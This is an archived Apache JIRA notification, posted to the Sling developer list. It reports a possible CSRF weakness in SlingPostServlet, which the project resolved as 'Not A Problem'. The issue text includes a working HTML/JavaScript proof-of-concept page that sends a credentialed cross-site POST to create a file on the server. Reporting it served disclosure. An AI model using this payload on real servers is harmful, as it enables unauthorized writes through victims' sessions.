You are viewing a plain text version of this content. The canonical link for it is here.

Posted to dev@sling.apache.org by "Carsten Ziegeler (JIRA)" <ji...@apache.org> on 2016/08/31 13:17:20 UTC

[jira] [Resolved] (SLING-5957) SlingPostServlet: susceptible CSRF with empty content-type

     [ https://issues.apache.org/jira/browse/SLING-5957?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Carsten Ziegeler resolved SLING-5957.
-------------------------------------
    Resolution: Not A Problem

> SlingPostServlet: susceptible CSRF with empty content-type
> ----------------------------------------------------------
>
>                 Key: SLING-5957
>                 URL: https://issues.apache.org/jira/browse/SLING-5957
>             Project: Sling
>          Issue Type: Bug
>          Components: Servlets
>            Reporter: Dominique Jäggi
>              Labels: csrf, security
>
> The _SlingPostServlet_ creates a resource from a cross-site request like so:
> {code}
> <html>
>   <body>
>     <script>
>       function submitRequest()
>       {
>         var xhr = new XMLHttpRequest();
>         xhr.open("POST", "http://localhost:8080/test/csrf.txt", true);
>         xhr.withCredentials = true;
>         var body = "This file has been uploaded via CSRF.=\r\n";
>         var aBody = new Uint8Array(body.length);
>         for (var i = 0; i < aBody.length; i++)
>           aBody[i] = body.charCodeAt(i); 
>         xhr.send(new Blob([aBody]));
>       }
>     </script>
>     <form action="#">
>       <input type="button" value="Submit request" onclick="submitRequest();" />
>     </form>
>   </body>
> </html>
> {code}



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)